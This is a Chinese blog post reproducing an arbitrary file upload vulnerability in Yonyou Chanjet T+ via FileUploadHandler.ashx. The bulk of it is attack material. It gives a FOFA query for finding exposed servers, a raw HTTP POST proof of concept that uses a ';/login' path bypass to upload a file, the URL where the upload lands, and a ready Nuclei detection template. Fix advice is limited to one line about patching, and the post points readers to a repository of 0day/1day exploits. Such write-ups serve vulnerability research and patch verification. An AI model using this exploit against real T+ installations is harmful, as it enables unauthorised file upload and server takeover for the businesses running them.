首页 > 其他分享 >【漏洞复现】用友畅捷通-TPlus FileUploadHandler.ashx 任意文件上传

【漏洞复现】用友畅捷通-TPlus FileUploadHandler.ashx 任意文件上传

时间:2024-09-29 21:20:24浏览次数:12  
标签:-- FileUploadHandler Content TPlus ashx f95ec6be8c3acff8e3edd3d910d3b9a6 捷通


》》》产品描述《《《

    ‌用友畅捷通-TPlus‌是由用友集团成员企业畅捷通公司开发的一款企业级财务管理工具,旨在帮助企业实现财务管理的现代化和智能化。作为畅捷通旗下的核心产品,TPlus集成了财务核算、资金管理、预算控制等多项核心功能,通过自动化和智能化的手段,提高企业财务管理效率,降低运营成本。


》》》漏洞描述《《《

       用友畅捷通T+ FileUploadHandler.ashx存在任意文件上传漏洞,攻击者通过该漏洞可以上传任意文件,可能导致服务器被控制。


》》》搜索语句《《《

Fofa:app="畅捷通-TPlus"


》》》漏洞复现《《《

POC

POST /tplus/SM/SetupAccount/FileUploadHandler.ashx/;/login HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 180
Content-Type: multipart/form-data; boundary=f95ec6be8c3acff8e3edd3d910d3b9a6
 
--f95ec6be8c3acff8e3edd3d910d3b9a6
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: image/jpeg
 
hello,world!
--f95ec6be8c3acff8e3edd3d910d3b9a6--

上传成功后拼接路径进行访问:

http://your-ip:port/tplus/UserFiles/test.txt

yaml

id: 用友畅捷通-TPlus FileUploadHandler.ashx 任意文件上传

info:
  name: Tplus File Upload Vulnerability
  author: Kelichen
  severity: high
  description: |
    This template checks for an arbitrary file upload vulnerability in the Tplus application.

http:
  - raw:
      - |
        POST /tplus/SM/SetupAccount/FileUploadHandler.ashx/;/login HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close
        Content-Type: multipart/form-data; boundary=f95ec6be8c3acff8e3edd3d910d3b9a6

        --f95ec6be8c3acff8e3edd3d910d3b9a6
        Content-Disposition: form-data; name="file"; filename="test.txt"
        Content-Type: image/jpeg

        hello,world!
        --f95ec6be8c3acff8e3edd3d910d3b9a6--

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "image/jpeg"
        part: body


》》》修复建议《《《

厂商已发布补丁 请即时修复。


-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

标签:--,FileUploadHandler,Content,TPlus,ashx,f95ec6be8c3acff8e3edd3d910d3b9a6,捷通
From: https://blog.csdn.net/qq_48368964/article/details/142643837

相关文章

  • 【已解决】ElementPlus 的 el-menu 组件如何用 js 控制展开某个子菜单,并在其他组件中
    文章目录需求几次探索官网寻找线索(解决办法)需求我如何用代码来实现ElementPlus的菜单的展开和收缩呢?几次探索尝试通过找到节点之后,使用click事件,失败了//伪代码如下consthandleFindNodeAndClick=()=>{console.log('handleFindNodeAndClick');......
  • HighlightPlus插件介绍
    仅对官方文档进行了翻译注意:官方文档本身就落后实际,但对入门仍很有帮助,核心并没有较大改变,有的功能有差异,以实际为准.(目前我已校正了大部分差异,后续我会继续维护该文档)为什么为该插件做翻译?功能强大,使用简单,且还在维护.基于此版本的内置渲染管线文档快速开......
  • ElementPlus表格相关操作大全
            ElementPlus的表格组件(<el-table>)提供了丰富的功能和可扩展性基础表格:通过设置el-table的data属性来插入数据到表格列中,使用prop来指定数据字段,label定义列名,width定义列宽。条纹表格:设置stripe属性为true可以显示条纹间隔的表格。带边框......
  • 标准的vue3 elementplus格式,不用export default
    <template><div><!--查询表单--><el-form:inline="true":model="filters"class="demo-form-inline"><el-form-itemlabel="产品料号"><el-inputv-model="filters.......
  • 众诚网上订单系统 o_sa_order.ashx SQL注入漏洞复现
    1产品简介众诚网上订单系统通过集成互联网技术和先进的管理思想,为生产制造企业、多分销渠道的批零兼营、各类商贸批发业务提供了一站式的订单管理解决方案。该系统支持电脑PC、平板、手机APP同步操作,实现了订单、商品、客户、资金、信息、支付、物流和电子商务的全方位连接,......
  • elementplus vue3 table表格动态合并单元格
    letcellList:any[]=[]//单元格数组letcount:number=0//计数constcomputeCell=(tableList:any[],name)=>{cellList=[]count=0for(leti=0;i<tableList.length;i++){if(i===0){//先设置第一项cellList.push(1)......
  • Vite2.0+ElementPlus+Koa2+Mongo全栈开发通用后台系统Vue3
    Vite2.0+ElementPlus+Koa2+Mongo全栈开发通用后台系统Vue3前言当前基于NodeJs框架的全栈工程实践非常之火,作为一个很长时间未接触代码的前程序猿。一直有点手痒痒,想尝试一下这种全新的编程体验,于是就重新开始了填坑的不归之路。这一套框架是基于现在的前后台分离的指导原则来......
  • TS4+Vite+Vitest+Vitepress Vue3.3 自主打造媲美ElementPlus的组件库
    TS4+Vite+Vitest+VitepressVue3.3自主打造媲美ElementPlus的组件库这个问题看起来是想要创建一个类似ElementPlus的Vue组件库,并且使用TypeScript、Vite、Vitest和Vitepress进行开发。以下是一个简化的指南,用于创建一个自己的Vue组件库项目框架。安装必要的工具:npm......
  • Vue3+TypeScript+Vite+Pinia+ElementPlus开发项目在线医疗服务平台
     前言随着vue3.0的越来越受欢迎,开始有许多公司和个人开始学习并使用vue3开发项目。我从接触学习并使用vue2,到现在的vue3,工作中也一直在使用vue。vue3也发布很长时间了,目前vue3+vite+ts再结合一些优秀的UI框架,如Elementplus,Antdesign,NaiveUI,移动端的VantUI,成为了较为流......
  • 设置IIS支持ashx
    打开【处理程序映射】默认界面如下(是不支持处理ashx的):如果需要设置能处理ashx,需要开启ASP.NET4.8再打开【处理程序映射】,如下: ......